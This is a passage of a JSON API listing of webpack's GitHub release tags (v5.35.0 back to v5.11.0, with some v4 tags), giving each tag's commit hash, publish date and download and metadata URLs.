%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"